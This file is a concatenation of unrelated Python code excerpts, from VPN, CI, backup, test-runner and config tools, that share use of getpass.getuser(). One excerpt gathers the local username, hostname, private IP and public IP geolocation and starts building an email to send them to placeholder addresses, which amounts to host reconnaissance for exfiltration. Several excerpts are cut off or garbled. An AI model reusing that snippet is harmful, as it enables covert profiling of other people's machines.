""" Changes Galicaster default behaviour to show a menu to enter metadata before starting a manual recording. """ from galicaster.core import context import getpass from galicaster.utils import series as list_series from galicaster.classui.metadata import MetadataClass, DCTERMS, EQUIV import os from galicaster.utils.i18n import _ #DCTERMS = ["title", "creator", "description", "language", "isPartOf"] MAPPINGS = {'user': getpass.getuser()} def init(): dispatcher = context.get_dispatcher() dispatcher.connect("galicaster-init", post_init) def post_init(source=None): global recorder_ui global rec_button global metadata metadata = {}
import os import getpass try: USER = os.environ["SUDO_USER"] except KeyError: USER = getpass.getuser() CONFIG_DIR = os.path.join(os.path.expanduser("~{0}".format(USER)), ".pvpn-cli") CONFIG_FILE = os.path.join(CONFIG_DIR, "pvpn-cli.cfg") TEMPLATE_FILE = os.path.join(CONFIG_DIR, "template.ovpn") SERVER_INFO_FILE = os.path.join(CONFIG_DIR, "serverinfo.json") SPLIT_TUNNEL_FILE = os.path.join(CONFIG_DIR, "split_tunnel.txt") OVPN_FILE = os.path.join(CONFIG_DIR, "connect.ovpn") PASSFILE = os.path.join(CONFIG_DIR, "pvpnpass") VERSION = "2.2.1"
commentOn(comment_url, True, False, True, resultsurl) elif returncode != 0: print("Failed to test pull - sending comment to: " + comment_url) commentOn(comment_url, False, False, False, resultsurl) else: print("Successfully tested pull - sending comment to: " + comment_url) commentOn(comment_url, True, False, False, resultsurl) open(os.environ["TESTED_DB"], "a").write(commit + "\n") def environ_default(setting, value): if not setting in os.environ: os.environ[setting] = value if getpass.getuser() != "root": print("Run me as root!") sys.exit(1) if "GITHUB_USER" not in os.environ or "GITHUB_AUTH_TOKEN" not in os.environ: print("GITHUB_USER and/or GITHUB_AUTH_TOKEN environment variables not set") sys.exit(1) environ_default("CLONE_URL", "https://github.com/beginnercoin/beginnercoin.git") environ_default("MINGW_DEPS_DIR", "/mnt/w32deps") environ_default("SCRIPTS_DIR", "/mnt/test-scripts") environ_default("CHROOT_COPY", "/mnt/chroot-tmp") environ_default("CHROOT_MASTER", "/mnt/chroot") environ_default("OUT_DIR", "/mnt/out") environ_default("BUILD_PATH", "/mnt/beginnercoin")
# 运行时弹出密码输入提示 import getpass def svc_login(user, passwd): passwd user = getpass.getuser() user = input('Enter your username:'******'Yay!') else: print('Boo!')
def development(): """ Specify development hosts """ env.user = getpass.getuser() env.hosts = ["localhost"] #"host1", "host2", "host3"]
def check_updates_required(): """Checks if there are manual updates required. Sometimes, especially in developer installs, some things need to be tweaked by hand before Review Board can be used on this server. """ global _install_fine updates_required = [] if not _install_fine: site_dir = os.path.dirname(settings.HTDOCS_ROOT) devel_install = (os.path.exists( os.path.join(settings.LOCAL_ROOT, 'manage.py'))) siteconfig = None # Check if we can access a SiteConfiguration. There should always # be one, unless the user has erased stuff by hand. # # This also checks for any sort of errors in talking to the database. # This could be due to the database being down, or corrupt, or # tables locked, or an empty database, or other cases. We want to # catch this before getting the point where plain 500 Internal Server # Errors appear. try: siteconfig = SiteConfiguration.objects.get_current() except (DatabaseError, SiteConfiguration.DoesNotExist), e: updates_required.append( ('admin/manual-updates/database-error.html', { 'error': e, })) # Check if the version running matches the last stored version. # Only do this for non-debug installs, as it's really annoying on # a developer install.: cur_version = get_version_string() if siteconfig and siteconfig.version != cur_version: updates_required.append( ('admin/manual-updates/version-mismatch.html', { 'current_version': cur_version, 'stored_version': siteconfig.version, 'site_dir': site_dir, 'devel_install': devel_install, })) # Check if the site has moved and the old media directory no longer # exists. if siteconfig and not os.path.exists(settings.STATIC_ROOT): new_media_root = os.path.join(settings.HTDOCS_ROOT, "static") if os.path.exists(new_media_root): siteconfig.set("site_media_root", new_media_root) settings.STATIC_ROOT = new_media_root # Check if the user has any pending static media configuration # changes they need to make. if siteconfig and 'manual-updates' in siteconfig.settings: stored_updates = siteconfig.settings['manual-updates'] if not stored_updates.get('static-media', False): updates_required.append( ('admin/manual-updates/server-static-config.html', { 'STATIC_ROOT': settings.STATIC_ROOT, 'SITE_ROOT': settings.SITE_ROOT, 'SITE_DIR': settings.LOCAL_ROOT, })) # Check if there's a media/uploaded/images directory. If not, this is # either a new install or is using the old-style media setup and needs # to be manually upgraded. uploaded_dir = os.path.join(settings.MEDIA_ROOT, "uploaded") if not os.path.isdir(uploaded_dir) or \ not os.path.isdir(os.path.join(uploaded_dir, "images")): updates_required.append( ("admin/manual-updates/media-upload-dir.html", { 'MEDIA_ROOT': settings.MEDIA_ROOT })) try: username = getpass.getuser() except ImportError: # This will happen if running on Windows (which doesn't have # the pwd module) and if %LOGNAME%, %USER%, %LNAME% and # %USERNAME% are all undefined. username = "******" # Check if the data directory (should be $HOME) is writable by us. data_dir = os.environ.get('HOME', '') if (not data_dir or not os.path.isdir(data_dir) or not os.access(data_dir, os.W_OK)): try: username = getpass.getuser() except ImportError: # This will happen if running on Windows (which doesn't have # the pwd module) and if %LOGNAME%, %USER%, %LNAME% and # %USERNAME% are all undefined. username = "******" updates_required.append(('admin/manual-updates/data-dir.html', { 'data_dir': data_dir, 'writable': os.access(data_dir, os.W_OK), 'server_user': username, 'expected_data_dir': os.path.join(site_dir, 'data'), })) # Check if the htdocs/media/ext directory is writable by us. ext_dir = settings.EXTENSIONS_STATIC_ROOT if not os.path.isdir(ext_dir) or not os.access(ext_dir, os.W_OK): updates_required.append(('admin/manual-updates/ext-dir.html', { 'ext_dir': ext_dir, 'writable': os.access(ext_dir, os.W_OK), 'server_user': username, })) if not is_exe_in_path('patch'): if sys.platform == 'win32': binaryname = 'patch.exe' else: binaryname = 'patch' updates_required.append( ("admin/manual-updates/install-patch.html", { 'platform': sys.platform, 'binaryname': binaryname, 'search_path': os.getenv('PATH'), })) # # NOTE: Add new checks above this. # _install_fine = not updates_required
def GetToken(): user = getpass.getuser() return access_control.ACLToken(username=user)
def process_tool(self, args): """Process Tool execution in Faraday""" if not args.json_output: if not args.workspace_name: if active_config.workspace: workspace_name = active_config.workspace else: self._cmd.perror("No active Workspace") return else: workspace_name = args.workspace_name if not self._cmd.api_client.is_workspace_available(workspace_name): if not args.create_workspace: self._cmd.perror(f"Invalid workspace: {workspace_name}") return else: try: self._cmd.api_client.create_workspace(workspace_name) self._cmd.poutput( cmd2.style( f"Workspace {workspace_name} created", fg=COLORS.GREEN, ) ) except Exception as e: self._cmd.perror(f"Error creating workspace: {e}") return else: destination_workspace = workspace_name else: destination_workspace = workspace_name if args.plugin_id: plugin = self._cmd.plugins_manager.get_plugin(args.plugin_id) if not plugin: self._cmd.perror(f"Invalid Plugin: {args.plugin_id}") return else: plugin = self._cmd.command_analyzer.get_plugin(args.command) if plugin: if not args.json_output: self._cmd.poutput( cmd2.style( f"{self._cmd.emojis['laptop']} " f"Processing {plugin.id} command", fg=COLORS.GREEN, ) ) show_command_output = not args.json_output command_json = utils.run_tool( plugin, getpass.getuser(), args.command, show_output=show_command_output, ) if not command_json: self._cmd.perror( f"{self._cmd.emojis['cross']} Command execution error!!" ) else: command_json = utils.apply_tags( command_json, args.tag_host, args.tag_service, args.tag_vuln, ) if args.json_output: self._cmd.poutput(json.dumps(command_json, indent=4)) else: self._cmd.data_queue.put( { "workspace": destination_workspace, "json_data": command_json, } ) else: self._cmd.perror( f"Could not detect plugin for command: {args.command}" )
# modified from # https://github.com/nickstenning/annotator-store-flask/blob/89b3037b995f094f73f24037123c0e818036e36c/annotator/store.py import datetime import json from annotator_model import DBMixin, Annotation, Range import annotator_model as AModel import getpass from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker CURRENT_USER_ID = unicode(getpass.getuser()) __all__ = ["app", "store", "setup_app"] # module level global session = None def setup_database(DSN): ''' `DSN`: data source name; examples - in memory: sqlite:///:memory: - sqlite (assumed use case): sqlite:///PATH/TO/YOUR/database.db ''' global session if session is not None: return engine = create_engine(DSN) Session = sessionmaker(bind=engine) session = Session()
def run(args): import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) glb_file = args['--global-conf'] inventory_file = args['--inventory'] osp_cred_file = args['--osp-cred'] suite_file = args['--suite'] store = args.get('--store', False) reuse = args.get('--reuse', None) base_url = args.get('--rhs-ceph-repo', None) ubuntu_repo = args.get('--ubuntu-repo', None) kernel_repo = args.get('--kernel-repo', None) rhbuild = args.get('--rhbuild') docker_registry = args.get('--docker-registry', None) docker_image = args.get('--docker-image', None) docker_tag = args.get('--docker-tag', None) docker_insecure_registry = args.get('--insecure-registry', False) post_results = args.get('--post-results') skip_setup = args.get('--skip-cluster', False) skip_subscription = args.get('--skip-subscription', False) cleanup_name = args.get('--cleanup', None) post_to_report_portal = args.get('--report-portal', False) console_log_level = args.get('--log-level') log_directory = args.get('--log-dir', '/tmp') instances_name = args.get('--instances-name') osp_image = args.get('--osp-image') filestore = args.get('--filestore', False) ec_pool_vals = args.get('--use-ec-pool', None) ignore_latest_nightly_container = args.get('--ignore-latest-container', False) skip_version_compare = args.get('--skip-version-compare', False) custom_config = args.get('--custom-config') custom_config_file = args.get('--custom-config-file') xunit_results = args.get('--xunit-results', False) # Set log directory and get absolute path run_id = timestamp() run_dir = create_run_dir(run_id, log_directory) startup_log = os.path.join(run_dir, "startup.log") print("Startup log location: {}".format(startup_log)) run_start_time = datetime.datetime.now() trigger_user = getuser() handler = logging.FileHandler(startup_log) handler.setLevel(logging.INFO) handler.setFormatter(formatter) root.addHandler(handler) if console_log_level: ch.setLevel(logging.getLevelName(console_log_level.upper())) if osp_cred_file: with open(osp_cred_file, 'r') as osp_cred_stream: osp_cred = yaml.safe_load(osp_cred_stream) if cleanup_name is not None: cleanup_ceph_nodes(osp_cred, cleanup_name) return 0 # Get ceph cluster version name with open("rhbuild.yaml") as fd: rhbuild_file = yaml.safe_load(fd) ceph = rhbuild_file['ceph'] ceph_name = None rhbuild_ = None try: ceph_name, rhbuild_ =\ next(filter( lambda x: x, [(ceph[x]['name'], x) for x in ceph if x == rhbuild.split(".")[0]])) except StopIteration: print("\nERROR: Please provide correct RH build version, run exited.") sys.exit(1) # Get base-url composes = ceph[rhbuild_]['composes'] if not base_url: if rhbuild in composes: base_url = composes[rhbuild]['base_url'] else: base_url = composes['latest']['base_url'] # Get ubuntu-repo if not ubuntu_repo and rhbuild.startswith('3'): if rhbuild in composes: ubuntu_repo = composes[rhbuild]['ubuntu_repo'] else: ubuntu_repo = composes['latest']['ubuntu_repo'] if glb_file: conf_path = os.path.abspath(glb_file) with open(conf_path, 'r') as conf_stream: conf = yaml.safe_load(conf_stream) if inventory_file: inventory_path = os.path.abspath(inventory_file) with open(inventory_path, 'r') as inventory_stream: inventory = yaml.safe_load(inventory_stream) if suite_file: suites_path = os.path.abspath(suite_file) with open(suites_path, 'r') as suite_stream: suite = yaml.safe_load(suite_stream) if osp_image and inventory.get('instance').get('create'): inventory.get('instance').get('create').update({'image-name': osp_image}) compose_id = None if os.environ.get('TOOL') is not None: ci_message = json.loads(os.environ['CI_MESSAGE']) compose_id = ci_message['compose_id'] compose_url = ci_message['compose_url'] + "/" product_name = ci_message.get('product_name', None) product_version = ci_message.get('product_version', None) log.info("COMPOSE_URL = %s ", compose_url) if os.environ['TOOL'] == 'pungi': # is a rhel compose log.info("trigger on CI RHEL Compose") elif os.environ['TOOL'] == 'rhcephcompose': # is a ubuntu compose log.info("trigger on CI Ubuntu Compose") ubuntu_repo = compose_url log.info("using ubuntu repo" + ubuntu_repo) elif os.environ['TOOL'] == 'bucko': # is a docker compose log.info("Trigger on CI Docker Compose") docker_registry, docker_tag = ci_message['repository'].split('/rh-osbs/rhceph:') docker_image = 'rh-osbs/rhceph' log.info("\nUsing docker registry from ci message: {registry} \nDocker image: {image}\nDocker tag:{tag}" .format(registry=docker_registry, image=docker_image, tag=docker_tag)) log.warning('Using Docker insecure registry setting') docker_insecure_registry = True if product_name == 'ceph': # is a rhceph compose base_url = compose_url log.info("using base url" + base_url) image_name = inventory.get('instance').get('create').get('image-name') ceph_version = [] ceph_ansible_version = [] distro = [] clients = [] if inventory.get('instance').get('create'): distro.append(inventory.get('instance').get('create').get('image-name')) for cluster in conf.get('globals'): if cluster.get('ceph-cluster').get('inventory'): cluster_inventory_path = os.path.abspath(cluster.get('ceph-cluster').get('inventory')) with open(cluster_inventory_path, 'r') as inventory_stream: cluster_inventory = yaml.safe_load(inventory_stream) image_name = cluster_inventory.get('instance').get('create').get('image-name') distro.append(image_name.replace('.iso', '')) # get COMPOSE ID and ceph version id = requests.get(base_url + "/COMPOSE_ID") compose_id = id.text if 'rhel' in image_name.lower(): ceph_pkgs = requests.get(base_url + "/compose/Tools/x86_64/os/Packages/") m = re.search(r'ceph-common-(.*?).x86', ceph_pkgs.text) ceph_version.append(m.group(1)) m = re.search(r'ceph-ansible-(.*?).rpm', ceph_pkgs.text) ceph_ansible_version.append(m.group(1)) log.info("Compose id is: " + compose_id) else: ubuntu_pkgs = requests.get(ubuntu_repo + "/Tools/dists/xenial/main/binary-amd64/Packages") m = re.search(r'ceph\nVersion: (.*)', ubuntu_pkgs.text) ceph_version.append(m.group(1)) m = re.search(r'ceph-ansible\nVersion: (.*)', ubuntu_pkgs.text) ceph_ansible_version.append(m.group(1)) distro = ','.join(list(set(distro))) ceph_version = ', '.join(list(set(ceph_version))) ceph_ansible_version = ', '.join(list(set(ceph_ansible_version))) log.info("Testing Ceph Version: " + ceph_version) log.info("Testing Ceph Ansible Version: " + ceph_ansible_version) if not os.environ.get('TOOL') and not ignore_latest_nightly_container: try: latest_container = get_latest_container(rhbuild) except ValueError: print("\nERROR:No latest nightly container UMB msg at /ceph/cephci-jenkins/latest-rhceph-container-info/," "specify using the cli args or use --ignore-latest-container") sys.exit(1) docker_registry = latest_container.get('docker_registry') if not docker_registry else docker_registry docker_image = latest_container.get('docker_image') if not docker_image else docker_image docker_tag = latest_container.get('docker_tag') if not docker_tag else docker_tag log.info("Using latest nightly docker image \nRegistry: {registry} \nDocker image: {image}\nDocker tag:{tag}" .format(registry=docker_registry, image=docker_image, tag=docker_tag)) docker_insecure_registry = True log.warning('Using Docker insecure registry setting') service = None suite_name = os.path.basename(suite_file).split(".")[0] if post_to_report_portal: log.info("Creating report portal session") service = create_report_portal_session() launch_name = "{suite_name} ({distro})".format(suite_name=suite_name, distro=distro) launch_desc = textwrap.dedent( """ ceph version: {ceph_version} ceph-ansible version: {ceph_ansible_version} compose-id: {compose_id} invoked-by: {user} """.format(ceph_version=ceph_version, ceph_ansible_version=ceph_ansible_version, user=getuser(), compose_id=compose_id)) if docker_image and docker_registry and docker_tag: launch_desc = launch_desc + textwrap.dedent( """ docker registry: {docker_registry} docker image: {docker_image} docker tag: {docker_tag} invoked-by: {user} """.format(docker_registry=docker_registry, docker_image=docker_image, user=getuser(), docker_tag=docker_tag)) service.start_launch(name=launch_name, start_time=timestamp(), description=launch_desc) if reuse is None: ceph_cluster_dict, clients = create_nodes(conf, inventory, osp_cred, run_id, service, instances_name) else: ceph_store_nodes = open(reuse, 'rb') ceph_cluster_dict = pickle.load(ceph_store_nodes) ceph_store_nodes.close() for cluster_name, cluster in ceph_cluster_dict.items(): for node in cluster: node.reconnect() if store: ceph_clusters_file = 'rerun/ceph-snapshot-' + timestamp() if not os.path.exists(os.path.dirname(ceph_clusters_file)): os.makedirs(os.path.dirname(ceph_clusters_file)) store_cluster_state(ceph_cluster_dict, ceph_clusters_file) sys.path.append(os.path.abspath('tests')) sys.path.append(os.path.abspath('tests/rados')) sys.path.append(os.path.abspath('tests/rbd')) sys.path.append(os.path.abspath('tests/rbd_mirror')) sys.path.append(os.path.abspath('tests/cephfs')) sys.path.append(os.path.abspath('tests/iscsi')) sys.path.append(os.path.abspath('tests/rgw')) sys.path.append(os.path.abspath('tests/ceph_ansible')) sys.path.append(os.path.abspath('tests/ceph_installer')) sys.path.append(os.path.abspath('tests/mgr')) sys.path.append(os.path.abspath('tests/dashboard')) sys.path.append(os.path.abspath('tests/misc_env')) tests = suite.get('tests') tcs = [] jenkins_rc = 0 # use ceph_test_data to pass around dynamic data between tests ceph_test_data = dict() ceph_test_data['custom-config'] = custom_config ceph_test_data['custom-config-file'] = custom_config_file for test in tests: test = test.get('test') tc = dict() tc['docker-containers-list'] = [] tc['name'] = test.get('name') tc['desc'] = test.get('desc') tc['file'] = test.get('module') tc['polarion-id'] = test.get('polarion-id') polarion_default_url = "https://polarion.engineering.redhat.com/polarion/#/project/CEPH/workitem?id=" tc['polarion-id-link'] = "{}{}".format(polarion_default_url, tc['polarion-id']) tc['rhbuild'] = rhbuild tc['ceph-version'] = ceph_version tc['ceph-ansible-version'] = ceph_ansible_version tc['compose-id'] = compose_id tc['distro'] = distro tc['suite-name'] = suite_name tc['suite-file'] = suite_file tc['conf-file'] = glb_file tc['ceph-version-name'] = ceph_name test_file = tc['file'] report_portal_description = tc['desc'] or '' unique_test_name = create_unique_test_name(tc['name'], test_names) test_names.append(unique_test_name) tc['log-link'] = configure_logger(unique_test_name, run_dir) mod_file_name = os.path.splitext(test_file)[0] test_mod = importlib.import_module(mod_file_name) print("\nRunning test: {test_name}".format(test_name=tc['name'])) if tc.get('log-link'): print("Test logfile location: {log_url}".format(log_url=tc['log-link'])) log.info("Running test %s", test_file) tc['duration'] = '0s' tc['status'] = 'Not Executed' start = datetime.datetime.now() for cluster_name in test.get('clusters', ceph_cluster_dict): if test.get('clusters'): config = test.get('clusters').get(cluster_name).get('config', {}) else: config = test.get('config', {}) if not config.get('base_url'): config['base_url'] = base_url config['rhbuild'] = rhbuild if 'ubuntu_repo' in locals(): config['ubuntu_repo'] = ubuntu_repo if skip_setup is True: config['skip_setup'] = True if skip_subscription is True: config['skip_subscription'] = True if args.get('--add-repo'): repo = args.get('--add-repo') if repo.startswith('http'): config['add-repo'] = repo config['docker-insecure-registry'] = docker_insecure_registry config['skip_version_compare'] = skip_version_compare if config and config.get('ansi_config'): if docker_registry: config.get('ansi_config')['ceph_docker_registry'] = str(docker_registry) if docker_image: config.get('ansi_config')['ceph_docker_image'] = str(docker_image) if docker_tag: config.get('ansi_config')['ceph_docker_image_tag'] = str(docker_tag) cluster_docker_registry = config.get('ansi_config').get('ceph_docker_registry') cluster_docker_image = config.get('ansi_config').get('ceph_docker_image') cluster_docker_tag = config.get('ansi_config').get('ceph_docker_image_tag') if cluster_docker_registry: cluster_docker_registry = config.get('ansi_config').get('ceph_docker_registry') report_portal_description = report_portal_description + '\ndocker registry: {docker_registry}' \ .format(docker_registry=cluster_docker_registry) if cluster_docker_image: cluster_docker_image = config.get('ansi_config').get('ceph_docker_image') report_portal_description = report_portal_description + '\ndocker image: {docker_image}' \ .format(docker_image=cluster_docker_image) if cluster_docker_tag: cluster_docker_tag = config.get('ansi_config').get('ceph_docker_image_tag') report_portal_description = report_portal_description + '\ndocker tag: {docker_tag}' \ .format(docker_tag=cluster_docker_tag) if cluster_docker_image and cluster_docker_registry: tc['docker-containers-list'].append('{docker_registry}/{docker_image}:{docker_tag}'.format( docker_registry=cluster_docker_registry, docker_image=cluster_docker_image, docker_tag=cluster_docker_tag)) if filestore: config['filestore'] = filestore if ec_pool_vals: config['ec-pool-k-m'] = ec_pool_vals if args.get('--hotfix-repo'): hotfix_repo = args.get('--hotfix-repo') if hotfix_repo.startswith('http'): config['hotfix_repo'] = hotfix_repo if kernel_repo is not None: config['kernel-repo'] = kernel_repo if osp_cred: config['osp_cred'] = osp_cred # if Kernel Repo is defined in ENV then set the value in config if os.environ.get('KERNEL-REPO-URL') is not None: config['kernel-repo'] = os.environ.get('KERNEL-REPO-URL') try: if post_to_report_portal: service.start_test_item(name=unique_test_name, description=report_portal_description, start_time=timestamp(), item_type="STEP") service.log(time=timestamp(), message="Logfile location: {}".format(tc['log-link']), level="INFO") service.log(time=timestamp(), message="Polarion ID: {}".format(tc['polarion-id']), level="INFO") rc = test_mod.run(ceph_cluster=ceph_cluster_dict[cluster_name], ceph_nodes=ceph_cluster_dict[cluster_name], config=config, test_data=ceph_test_data, ceph_cluster_dict=ceph_cluster_dict, clients=clients) except BaseException: if post_to_report_portal: service.log(time=timestamp(), message=traceback.format_exc(), level="ERROR") log.error(traceback.format_exc()) rc = 1 finally: if store: store_cluster_state(ceph_cluster_dict, ceph_clusters_file) if rc != 0: break elapsed = (datetime.datetime.now() - start) tc['duration'] = elapsed if rc == 0: tc['status'] = 'Pass' msg = "Test {} passed".format(test_mod) log.info(msg) print(msg) if post_to_report_portal: service.finish_test_item(end_time=timestamp(), status="PASSED") if post_results: post_to_polarion(tc=tc) else: tc['status'] = 'Failed' msg = "Test {} failed".format(test_mod) log.info(msg) print(msg) jenkins_rc = 1 if post_to_report_portal: service.finish_test_item(end_time=timestamp(), status="FAILED") if post_results: post_to_polarion(tc=tc) if test.get('abort-on-fail', False): log.info("Aborting on test failure") tcs.append(tc) break if test.get('destroy-cluster') is True: cleanup_ceph_nodes(osp_cred, instances_name) if test.get('recreate-cluster') is True: ceph_cluster_dict, clients = create_nodes(conf, inventory, osp_cred, run_id, service, instances_name) tcs.append(tc) url_base = "http://magna002.ceph.redhat.com/cephci-jenkins" run_dir_name = run_dir.split('/')[-1] log.info("\nAll test logs located here: {base}/{dir}".format(base=url_base, dir=run_dir_name)) close_and_remove_filehandlers() if post_to_report_portal: service.finish_launch(end_time=timestamp()) service.terminate() if xunit_results: create_xunit_results(suite_name, tcs, run_dir) print("\nAll test logs located here: {base}/{dir}".format(base=url_base, dir=run_dir_name)) print_results(tcs) send_to_cephci = post_results or post_to_report_portal run_end_time = datetime.datetime.now() total_run_time = (datetime.datetime.now() - run_start_time) total_time = """'''Start Time:''' {a} '''End Time:''' {b} '''Total duration:'''{c} \ """.format(a=run_start_time, b=run_end_time, c=total_run_time) email_results(tcs, run_id, trigger_user, run_dir, total_time, send_to_cephci) return jenkins_rc
import os from datetime import datetime, timedelta import re import getpass # read ssh credentials from environment key = os.environ.get('GPUMONITOR_KEY', None) password = os.environ.get('GPUMONITOR_PASS', None) user = os.environ.get('GPUMONITOR_USER', getpass.getuser()) if user is None: raise ValueError('username for SSH is not set') # interval to iterate through servers update_interval = timedelta(seconds=30) # file to write cache to cache_file = 'cache.pkl' # fill in your gpu servers here servers = [ 'gpuserver1', 'gpuserver2', ] # process filter process_filter = re.compile(r'.*') def update_config(file_path): global cache_file, process_filter, servers, update_interval import json with open(file_path, 'r') as f:
__status__ = "live" import json import socket import getpass from urllib.request import urlopen import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.base import MIMEBase from email.mime.image import MIMEImage from email import encoders import datetime as dt #USERNAME username = getpass.getuser() #HOSTNAME hostname = socket.gethostname() #PRIVATE IP privateIP = socket.gethostbyname(hostname) #PUBLIC IP, CITY, REGION, COUNTRY, GEO COORDINATES, POSTAL, TELECOM url = 'http://ipinfo.io/json' response = urlopen(url) data = json.load(response) del (data['readme']) #don't need this #CREATING EMAIL fromaddr = "from_email_which_will_be_logged" #Make sure it's allowed to log in from less secure apps. ex [email protected] toaddr = "to_email_where_info_is_sended" #ex [email protected]
def __init__(self, parsed_url): global paramiko duplicity.backend.Backend.__init__(self, parsed_url) self.retry_delay = 10 if parsed_url.path: # remove first leading '/' self.remote_dir = re.sub(r'^/', r'', parsed_url.path, 1) else: self.remote_dir = u'.' # lazily import paramiko when we need it # debian squeeze's paramiko is a bit old, so we silence randompool # depreciation warning note also: passphrased private keys work with # squeeze's paramiko only if done with DES, not AES import warnings warnings.simplefilter(u"ignore") try: import paramiko except ImportError: raise warnings.resetwarnings() class AgreedAddPolicy (paramiko.AutoAddPolicy): u""" Policy for showing a yes/no prompt and adding the hostname and new host key to the known host file accordingly. This class simply extends the AutoAddPolicy class with a yes/no prompt. """ def missing_host_key(self, client, hostname, key): fp = hexlify(key.get_fingerprint()) fingerprint = u':'.join(a + b for a, b in list(zip(fp[::2], fp[1::2]))) question = u"""The authenticity of host '%s' can't be established. %s key fingerprint is %s. Are you sure you want to continue connecting (yes/no)? """ % (hostname, key.get_name().upper(), fingerprint) while True: sys.stdout.write(question) choice = input().lower() if choice in [u'yes', u'y']: paramiko.AutoAddPolicy.missing_host_key(self, client, hostname, key) return elif choice in [u'no', u'n']: raise AuthenticityException(hostname) else: question = u"Please type 'yes' or 'no': " class AuthenticityException (paramiko.SSHException): def __init__(self, hostname): paramiko.SSHException.__init__(self, u'Host key verification for server %s failed.' % hostname) self.client = paramiko.SSHClient() self.client.set_missing_host_key_policy(AgreedAddPolicy()) # paramiko uses logging with the normal python severity levels, # but duplicity uses both custom levels and inverted logic...*sigh* self.client.set_log_channel(u"sshbackend") ours = paramiko.util.get_logger(u"sshbackend") dest = logging.StreamHandler(sys.stderr) dest.setFormatter(logging.Formatter(u'ssh: %(message)s')) ours.addHandler(dest) # ..and the duplicity levels are neither linear, # nor are the names compatible with python logging, # eg. 'NOTICE'...WAAAAAH! plevel = logging.getLogger(u"duplicity").getEffectiveLevel() if plevel <= 1: wanted = logging.DEBUG elif plevel <= 5: wanted = logging.INFO elif plevel <= 7: wanted = logging.WARNING elif plevel <= 9: wanted = logging.ERROR else: wanted = logging.CRITICAL ours.setLevel(wanted) # load known_hosts files # paramiko is very picky wrt format and bails out on any problem... try: if os.path.isfile(u"/etc/ssh/ssh_known_hosts"): self.client.load_system_host_keys(u"/etc/ssh/ssh_known_hosts") except Exception as e: raise BackendException(u"could not load /etc/ssh/ssh_known_hosts, " u"maybe corrupt?") try: # use load_host_keys() to signal it's writable to paramiko # load if file exists or add filename to create it if needed file = os.path.expanduser(u'~/.ssh/known_hosts') if os.path.isfile(file): self.client.load_host_keys(file) else: self.client._host_keys_filename = file except Exception as e: raise BackendException(u"could not load ~/.ssh/known_hosts, " u"maybe corrupt?") u""" the next block reorganizes all host parameters into a dictionary like SSHConfig does. this dictionary 'self.config' becomes the authorative source for these values from here on. rationale is that it is easiest to deal wrt overwriting multiple values from ssh_config file. (ede 03/2012) """ self.config = {u'hostname': parsed_url.hostname} # get system host config entries self.config.update(self.gethostconfig(u'/etc/ssh/ssh_config', parsed_url.hostname)) # update with user's config file self.config.update(self.gethostconfig(u'~/.ssh/config', parsed_url.hostname)) # update with url values # username from url if parsed_url.username: self.config.update({u'user': parsed_url.username}) # username from input if u'user' not in self.config: self.config.update({u'user': getpass.getuser()}) # port from url if parsed_url.port: self.config.update({u'port': parsed_url.port}) # ensure there is deafult 22 or an int value if u'port' in self.config: self.config.update({u'port': int(self.config[u'port'])}) else: self.config.update({u'port': 22}) # parse ssh options for alternative ssh private key, identity file m = re.search(r"^(?:.+\s+)?(?:-oIdentityFile=|-i\s+)(([\"'])([^\\2]+)\\2|[\S]+).*", globals.ssh_options) if (m is not None): keyfilename = m.group(3) if m.group(3) else m.group(1) self.config[u'identityfile'] = keyfilename # ensure ~ is expanded and identity exists in dictionary if u'identityfile' in self.config: if not isinstance(self.config[u'identityfile'], list): # Paramiko 1.9.0 and earlier do not support multiple # identity files when parsing config files and always # return a string; later versions always return a list, # even if there is only one file given. # # All recent versions seem to support *using* multiple # identity files, though, so to make things easier, we # simply always use a list. self.config[u'identityfile'] = [self.config[u'identityfile']] self.config[u'identityfile'] = [ os.path.expanduser(i) for i in self.config[u'identityfile']] else: self.config[u'identityfile'] = None # get password, enable prompt if askpass is set self.use_getpass = globals.ssh_askpass # set url values for beautiful login prompt parsed_url.username = self.config[u'user'] parsed_url.hostname = self.config[u'hostname'] password = self.get_password() try: self.client.connect(hostname=self.config[u'hostname'], port=self.config[u'port'], username=self.config[u'user'], password=password, allow_agent=True, look_for_keys=True, key_filename=self.config[u'identityfile']) except Exception as e: raise BackendException(u"ssh connection to %s@%s:%d failed: %s" % ( self.config[u'user'], self.config[u'hostname'], self.config[u'port'], e)) self.client.get_transport().set_keepalive((int)(old_div(globals.timeout, 2))) self.scheme = duplicity.backend.strip_prefix(parsed_url.scheme, u'paramiko') self.use_scp = (self.scheme == u'scp') # scp or sftp? if (self.use_scp): # sanity-check the directory name if (re.search(u"'", self.remote_dir)): raise BackendException(u"cannot handle directory names with single quotes with scp") # make directory if needed self.runremote(u"mkdir -p '%s'" % (self.remote_dir,), False, u"scp mkdir ") else: try: self.sftp = self.client.open_sftp() except Exception as e: raise BackendException(u"sftp negotiation failed: %s" % e) # move to the appropriate directory, possibly after creating it and its parents dirs = self.remote_dir.split(os.sep) if len(dirs) > 0: if not dirs[0]: dirs = dirs[1:] dirs[0] = u'/' + dirs[0] for d in dirs: if (d == u''): continue try: attrs = self.sftp.stat(d) except IOError as e: if e.errno == errno.ENOENT: try: self.sftp.mkdir(d) except Exception as e: raise BackendException(u"sftp mkdir %s failed: %s" % (self.sftp.normalize(u".") + u"/" + d, e)) else: raise BackendException(u"sftp stat %s failed: %s" % (self.sftp.normalize(u".") + u"/" + d, e)) try: self.sftp.chdir(d) except Exception as e: raise BackendException(u"sftp chdir to %s failed: %s" % (self.sftp.normalize(u".") + u"/" + d, e))
import os import getpass joinpath = os.path.join USER = [getpass.getuser()] BASE_PATH = os.path.dirname(os.path.realpath(__file__)) os.chdir(BASE_PATH) print(f'set base dir to {BASE_PATH}') # saving models RESULTS_PATH_ABS = joinpath(BASE_PATH, 'results') if not os.path.exists(RESULTS_PATH_ABS): os.mkdir(RESULTS_PATH_ABS) OVERVIEW_FILE_REL = 'overview.csv' OVERVIEW_FILE_ABS = joinpath(RESULTS_PATH_ABS, OVERVIEW_FILE_REL)
